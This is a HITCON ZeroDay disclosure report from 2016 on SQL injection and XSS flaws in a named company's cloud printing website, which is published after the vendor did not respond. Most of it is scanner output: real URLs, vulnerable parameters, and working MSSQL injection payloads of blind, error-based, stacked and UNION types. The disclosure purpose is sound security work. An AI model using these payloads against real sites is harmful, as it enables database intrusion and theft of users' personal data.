永豐雲端印刷網 SQL injection and XSS - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00206
  • Vendor: 永豐紙業股份有限公司
  • Title: 永豐雲端印刷網 SQL injection and XSS
  • Introduction: SQL injection and XSS

處理狀態

目前狀態

公開
Last Update : 2016/11/17
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2016/09/15 03:27:21 : 新提交 (由 WhiteCat 更新此狀態)
  • 2016/09/26 09:13:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/09/27 23:27:38 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/11/15 03:00:02 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/11/17 01:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2016-00206
  • 通報者:andyw330 (WhiteCat)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

XSS: (太多了,只舉一個為例)
http://www.cloudw2p.com/site/product4.php?type=alert("XSS")

SQL injection:
https://www.cloudw2p.com/site/logincheck.php
http://www.cloudw2p.com/site/member_Search_product.php
http://www.cloudw2p.com/site/photo_show_info.php?obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd
http://www.cloudw2p.com/site/photo_show.php?show=all&page=2&&BTYPE=%&iBOOKNAME=
http://www.cloudw2p.com/site/design/mydesign_detail.php?WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf
http://www.cloudw2p.com/site/design/mydesign_author.php?designername=Top
http://www.cloudw2p.com/site/design/index.php?designername=&show=notebook1&info=&page=2&&iBOOKNAME=&O=X

敘述

由於有漏洞的網頁實在太多了
僅列部份頁面與注入點

https://www.cloudw2p.com/site/logincheck.php

Parameter: iid2 (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: iid2=' AND 4365=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4365=4365) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'nsKd'='nsKd&ipass2=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: iid2=' AND 6106=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'LaLo'='LaLo&ipass2=
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)

http://www.cloudw2p.com/site/member_Search_product.php

Parameter: BTYPE (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BTYPE=85-2' AND 4395=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4395=4395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'BVxy'='BVxy&OPDAYS1=3&PPID=100&number=3&ppWUNIT=56&num=3&WUNIT=&papertotle=168&UNIT702=15&num702=&totle702=0&ship2=75&ship=75&OPDAYS=3&Response=243
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

http://www.cloudw2p.com/site/photo_show_info.php?obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd

Parameter: obj (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd' AND 6940=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6940=6940) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND 'eVaC'='eVaC
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd' AND 4918=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'gWSy'='gWSy
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)

http://www.cloudw2p.com/site/photo_show.php?show=all&page=2&&BTYPE=%&iBOOKNAME=

Parameter: show (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all' AND 1054=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1054=1054) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'xeZr'='xeZr&page=2&&BTYPE=%&iBOOKNAME=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Parameter: iBOOKNAME (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%&iBOOKNAME=%' AND 3785=3785 AND '%'='
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%&iBOOKNAME=%' AND 9616=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9616=9616) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Parameter: BTYPE (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%' AND 7206=7206 AND 'IkHL'='IkHL&iBOOKNAME=
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%' AND 4249=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4249=4249) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'csQp'='csQp&iBOOKNAME=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

http://www.cloudw2p.com/site/design/mydesign_detail.php?WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf

Parameter: WBID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' AND 8402=8402 AND 'mrTO'='mrTO
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' AND 6199=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6199=6199) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113))) AND 'JfVg'='JfVg
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf';WAITFOR DELAY '0:0:5'--
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(121)+CHAR(110)+CHAR(71)+CHAR(106)+CHAR(68)+CHAR(81)+CHAR(73)+CHAR(81)+CHAR(101)+CHAR(112)+CHAR(65)+CHAR(84)+CHAR(97)+CHAR(112)+CHAR(104)+CHAR(103)+CHAR(87)+CHAR(100)+CHAR(83)+CHAR(97)+CHAR(70)+CHAR(65)+CHAR(83)+CHAR(112)+CHAR(114)+CHAR(84)+CHAR(78)+CHAR(65)+CHAR(76)+CHAR(120)+CHAR(121)+CHAR(100)+CHAR(111)+CHAR(86)+CHAR(112)+CHAR(111)+CHAR(108)+CHAR(112)+CHAR(81)+CHAR(72)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- inee
Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]

http://www.cloudw2p.com/site/design/mydesign_author.php?designername=Top

Parameter: designername (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=Top') AND 7728=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7728=7728) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)))-- Xlnc
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: designername=Top') OR 8944=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- pmCF
Vector: OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)

http://www.cloudw2p.com/site/design/index.php?designername=&show=notebook1&info=&page=2&&iBOOKNAME=&O=X

Parameter: designername (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=') AND 2465=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2465=2465) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113))) AND ('jhUA'='jhUA&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: designername=');WAITFOR DELAY '0:0:5'--&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: designername=') UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(100)+CHAR(112)+CHAR(117)+CHAR(65)+CHAR(87)+CHAR(117)+CHAR(98)+CHAR(104)+CHAR(82)+CHAR(97)+CHAR(86)+CHAR(67)+CHAR(67)+CHAR(107)+CHAR(70)+CHAR(122)+CHAR(74)+CHAR(69)+CHAR(115)+CHAR(112)+CHAR(112)+CHAR(65)+CHAR(108)+CHAR(67)+CHAR(120)+CHAR(66)+CHAR(87)+CHAR(84)+CHAR(71)+CHAR(103)+CHAR(72)+CHAR(106)+CHAR(74)+CHAR(97)+CHAR(114)+CHAR(107)+CHAR(115)+CHAR(89)+CHAR(72)+CHAR(72)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dBwy&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector:  UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]

Parameter: iBOOKNAME (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: designername=&show=notebook1&info=&page=2&&iBOOKNAME=%' AND 4246=4246 AND '%'='&O=X
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=&show=notebook1&info=&page=2&&iBOOKNAME=%' AND 5996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5996=5996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113))) AND '%'='&O=X
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

留言討論

;